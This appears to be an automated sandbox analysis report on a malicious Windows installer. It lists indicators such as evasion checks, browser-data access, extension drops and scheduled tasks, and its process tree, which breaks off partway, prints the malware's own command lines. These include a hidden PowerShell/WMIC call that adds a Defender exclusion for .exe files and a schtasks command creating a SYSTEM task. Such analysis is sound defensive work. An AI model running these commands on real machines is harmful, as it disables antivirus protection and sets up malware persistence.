Analysis
-
max time kernel
197s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08/07/2024, 05:03
Static task
static1
Behavioral task
behavioral1
Sample
79b80e679f3643a332f2cfb4561208c39481d0a17d100ec1089ba11c8d0bee5b.exe
Resource
win7-20240705-en
General
-
Target
79b80e679f3643a332f2cfb4561208c39481d0a17d100ec1089ba11c8d0bee5b.exe
-
Size
7.3MB
-
MD5
976e13a8be0834ba0a44250fc00b92d5
-
SHA1
3c6f7f9fecb55ee3fbe93a4bea22d54c48293389
-
SHA256
79b80e679f3643a332f2cfb4561208c39481d0a17d100ec1089ba11c8d0bee5b
-
SHA512
6f449b36e1bd599fb3b2b3b3f7e0327935f9a4750467a0bbee46edc64761be17e57fe1edbf6fa2fab978fd6bd5d9ba65105828189905eaa33bd2f38315506a44
-
SSDEEP
196608:91OzvcOvyLINKpIgKVdMEDH5963oKZn9FOo3KSgZU:3OzFsK0EDZ96l9F8ZU
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 36 2864 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1532 powershell.exe 2956 powershell.EXE 2864 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation xivOSoQ.exe -
Executes dropped EXE 4 IoCs
pid Process 436 Install.exe 2672 Install.exe 4444 Install.exe 3564 xivOSoQ.exe -
Loads dropped DLL 1 IoCs
pid Process 2864 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json xivOSoQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json xivOSoQ.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 xivOSoQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xivOSoQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 xivOSoQ.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 xivOSoQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 xivOSoQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft xivOSoQ.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\YnlfVYgOKBzU2\QauLkHodxrgZo.dll xivOSoQ.exe File created C:\Program Files (x86)\cxOzyxwiwgxKC\AzbMATR.xml xivOSoQ.exe File created C:\Program Files (x86)\kaFWtwbAU\HYlvdMs.xml xivOSoQ.exe File created C:\Program Files (x86)\XphReJKfUekSjEjSEbR\RRTSLjz.xml xivOSoQ.exe File created C:\Program Files (x86)\cxOzyxwiwgxKC\qkWlHkr.dll xivOSoQ.exe File created C:\Program Files (x86)\kaFWtwbAU\aLHdrZ.dll xivOSoQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi xivOSoQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xivOSoQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xivOSoQ.exe File created C:\Program Files (x86)\YnlfVYgOKBzU2\ntVIpYL.xml xivOSoQ.exe File created C:\Program Files (x86)\XphReJKfUekSjEjSEbR\swVSiel.dll xivOSoQ.exe File created C:\Program Files (x86)\ZBiqUlswAXUn\swYhBdt.dll xivOSoQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi xivOSoQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja xivOSoQ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\UVFLqlDmbCINydTUR.job schtasks.exe File created C:\Windows\Tasks\TTZUhnhJvcIitvR.job schtasks.exe File created C:\Windows\Tasks\ZeToUwFKfeuZKVaZa.job schtasks.exe File created C:\Windows\Tasks\bvSiQPTrXwRygMomlS.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2624 4444 WerFault.exe 83 1392 2672 WerFault.exe 73 4288 3564 WerFault.exe 153 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix xivOSoQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" xivOSoQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{39cd0eda-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{39cd0eda-0000-0000-0000-d01200000000}\NukeOnDelete = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache xivOSoQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket xivOSoQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{39cd0eda-0000-0000-0000-d01200000000} Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4012 schtasks.exe 2980 schtasks.exe 2320 schtasks.exe 2056 schtasks.exe 1388 schtasks.exe 304 schtasks.exe 720 schtasks.exe 3004 schtasks.exe 2292 schtasks.exe 4432 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1532 powershell.exe 1532 powershell.exe 1532 powershell.exe 4256 powershell.exe 4256 powershell.exe 4256 powershell.exe 2760 powershell.exe 2760 powershell.exe 2760 powershell.exe 2956 powershell.EXE 2956 powershell.EXE 2956 powershell.EXE 2864 powershell.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 2864 powershell.exe 2864 powershell.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe 3564 xivOSoQ.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1532 powershell.exe Token: SeIncreaseQuotaPrivilege 1184 WMIC.exe Token: SeSecurityPrivilege 1184 WMIC.exe Token: SeTakeOwnershipPrivilege 1184 WMIC.exe Token: SeLoadDriverPrivilege 1184 WMIC.exe Token: SeSystemProfilePrivilege 1184 WMIC.exe Token: SeSystemtimePrivilege 1184 WMIC.exe Token: SeProfSingleProcessPrivilege 1184 WMIC.exe Token: SeIncBasePriorityPrivilege 1184 WMIC.exe Token: SeCreatePagefilePrivilege 1184 WMIC.exe Token: SeBackupPrivilege 1184 WMIC.exe Token: SeRestorePrivilege 1184 WMIC.exe Token: SeShutdownPrivilege 1184 WMIC.exe Token: SeDebugPrivilege 1184 WMIC.exe Token: SeSystemEnvironmentPrivilege 1184 WMIC.exe Token: SeRemoteShutdownPrivilege 1184 WMIC.exe Token: SeUndockPrivilege 1184 WMIC.exe Token: SeManageVolumePrivilege 1184 WMIC.exe Token: 33 1184 WMIC.exe Token: 34 1184 WMIC.exe Token: 35 1184 WMIC.exe Token: 36 1184 WMIC.exe Token: SeIncreaseQuotaPrivilege 1184 WMIC.exe Token: SeSecurityPrivilege 1184 WMIC.exe Token: SeTakeOwnershipPrivilege 1184 WMIC.exe Token: SeLoadDriverPrivilege 1184 WMIC.exe Token: SeSystemProfilePrivilege 1184 WMIC.exe Token: SeSystemtimePrivilege 1184 WMIC.exe Token: SeProfSingleProcessPrivilege 1184 WMIC.exe Token: SeIncBasePriorityPrivilege 1184 WMIC.exe Token: SeCreatePagefilePrivilege 1184 WMIC.exe Token: SeBackupPrivilege 1184 WMIC.exe Token: SeRestorePrivilege 1184 WMIC.exe Token: SeShutdownPrivilege 1184 WMIC.exe Token: SeDebugPrivilege 1184 WMIC.exe Token: SeSystemEnvironmentPrivilege 1184 WMIC.exe Token: SeRemoteShutdownPrivilege 1184 WMIC.exe Token: SeUndockPrivilege 1184 WMIC.exe Token: SeManageVolumePrivilege 1184 WMIC.exe Token: 33 1184 WMIC.exe Token: 34 1184 WMIC.exe Token: 35 1184 WMIC.exe Token: 36 1184 WMIC.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 2956 powershell.EXE Token: SeDebugPrivilege 2864 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2632 WMIC.exe Token: SeIncreaseQuotaPrivilege 2632 WMIC.exe Token: SeSecurityPrivilege 2632 WMIC.exe Token: SeTakeOwnershipPrivilege 2632 WMIC.exe Token: SeLoadDriverPrivilege 2632 WMIC.exe Token: SeSystemtimePrivilege 2632 WMIC.exe Token: SeBackupPrivilege 2632 WMIC.exe Token: SeRestorePrivilege 2632 WMIC.exe Token: SeShutdownPrivilege 2632 WMIC.exe Token: SeSystemEnvironmentPrivilege 2632 WMIC.exe Token: SeUndockPrivilege 2632 WMIC.exe Token: SeManageVolumePrivilege 2632 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2632 WMIC.exe Token: SeIncreaseQuotaPrivilege 2632 WMIC.exe Token: SeSecurityPrivilege 2632 WMIC.exe Token: SeTakeOwnershipPrivilege 2632 WMIC.exe Token: SeLoadDriverPrivilege 2632 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4816 wrote to memory of 436 4816 79b80e679f3643a332f2cfb4561208c39481d0a17d100ec1089ba11c8d0bee5b.exe 72 PID 4816 wrote to memory of 436 4816 79b80e679f3643a332f2cfb4561208c39481d0a17d100ec1089ba11c8d0bee5b.exe 72 PID 4816 wrote to memory of 436 4816 79b80e679f3643a332f2cfb4561208c39481d0a17d100ec1089ba11c8d0bee5b.exe 72 PID 436 wrote to memory of 2672 436 Install.exe 73 PID 436 wrote to memory of 2672 436 Install.exe 73 PID 436 wrote to memory of 2672 436 Install.exe 73 PID 2672 wrote to memory of 4328 2672 Install.exe 75 PID 2672 wrote to memory of 4328 2672 Install.exe 75 PID 2672 wrote to memory of 4328 2672 Install.exe 75 PID 4328 wrote to memory of 1528 4328 forfiles.exe 77 PID 4328 wrote to memory of 1528 4328 forfiles.exe 77 PID 4328 wrote to memory of 1528 4328 forfiles.exe 77 PID 1528 wrote to memory of 1532 1528 cmd.exe 78 PID 1528 wrote to memory of 1532 1528 cmd.exe 78 PID 1528 wrote to memory of 1532 1528 cmd.exe 78 PID 1532 wrote to memory of 1184 1532 powershell.exe 79 PID 1532 wrote to memory of 1184 1532 powershell.exe 79 PID 1532 wrote to memory of 1184 1532 powershell.exe 79 PID 2672 wrote to memory of 2320 2672 Install.exe 81 PID 2672 wrote to memory of 2320 2672 Install.exe 81 PID 2672 wrote to memory of 2320 2672 Install.exe 81 PID 4444 wrote to memory of 4256 4444 Install.exe 84 PID 4444 wrote to memory of 4256 4444 Install.exe 84 PID 4444 wrote to memory of 4256 4444 Install.exe 84 PID 4256 wrote to memory of 2780 4256 powershell.exe 86 PID 4256 wrote to memory of 2780 4256 powershell.exe 86 PID 4256 wrote to memory of 2780 4256 powershell.exe 86 PID 2780 wrote to memory of 4408 2780 cmd.exe 87 PID 2780 wrote to memory of 4408 2780 cmd.exe 87 PID 2780 wrote to memory of 4408 2780 cmd.exe 87 PID 4256 wrote to memory of 536 4256 powershell.exe 88 PID 4256 wrote to memory of 536 4256 powershell.exe 88 PID 4256 wrote to memory of 536 4256 powershell.exe 88 PID 4256 wrote to memory of 820 4256 powershell.exe 89 PID 4256 wrote to memory of 820 4256 powershell.exe 89 PID 4256 wrote to memory of 820 4256 powershell.exe 89 PID 4256 wrote to memory of 932 4256 powershell.exe 90 PID 4256 wrote to memory of 932 4256 powershell.exe 90 PID 4256 wrote to memory of 932 4256 powershell.exe 90 PID 4256 wrote to memory of 4476 4256 powershell.exe 91 PID 4256 wrote to memory of 4476 4256 powershell.exe 91 PID 4256 wrote to memory of 4476 4256 powershell.exe 91 PID 4256 wrote to memory of 2948 4256 powershell.exe 92 PID 4256 wrote to memory of 2948 4256 powershell.exe 92 PID 4256 wrote to memory of 2948 4256 powershell.exe 92 PID 4256 wrote to memory of 1416 4256 powershell.exe 93 PID 4256 wrote to memory of 1416 4256 powershell.exe 93 PID 4256 wrote to memory of 1416 4256 powershell.exe 93 PID 4256 wrote to memory of 64 4256 powershell.exe 94 PID 4256 wrote to memory of 64 4256 powershell.exe 94 PID 4256 wrote to memory of 64 4256 powershell.exe 94 PID 4256 wrote to memory of 2204 4256 powershell.exe 95 PID 4256 wrote to memory of 2204 4256 powershell.exe 95 PID 4256 wrote to memory of 2204 4256 powershell.exe 95 PID 4256 wrote to memory of 2256 4256 powershell.exe 96 PID 4256 wrote to memory of 2256 4256 powershell.exe 96 PID 4256 wrote to memory of 2256 4256 powershell.exe 96 PID 4256 wrote to memory of 4164 4256 powershell.exe 97 PID 4256 wrote to memory of 4164 4256 powershell.exe 97 PID 4256 wrote to memory of 4164 4256 powershell.exe 97 PID 4256 wrote to memory of 3660 4256 powershell.exe 98 PID 4256 wrote to memory of 3660 4256 powershell.exe 98 PID 4256 wrote to memory of 3660 4256 powershell.exe 98 PID 4256 wrote to memory of 8 4256 powershell.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\79b80e679f3643a332f2cfb4561208c39481d0a17d100ec1089ba11c8d0bee5b.exe"C:\Users\Admin\AppData\Local\Temp\79b80e679f3643a332f2cfb4561208c39481d0a17d100ec1089ba11c8d0bee5b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Users\Admin\AppData\Local\Temp\7zS66E8.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Users\Admin\AppData\Local\Temp\7zS6949.tmp\Install.exe.\Install.exe /XibWdidQ "385132" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvSiQPTrXwRygMomlS" /SC once /ST 05:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6949.tmp\Install.exe\" PL /AFBgdidQi 385132 /S" /V1 /F4⤵
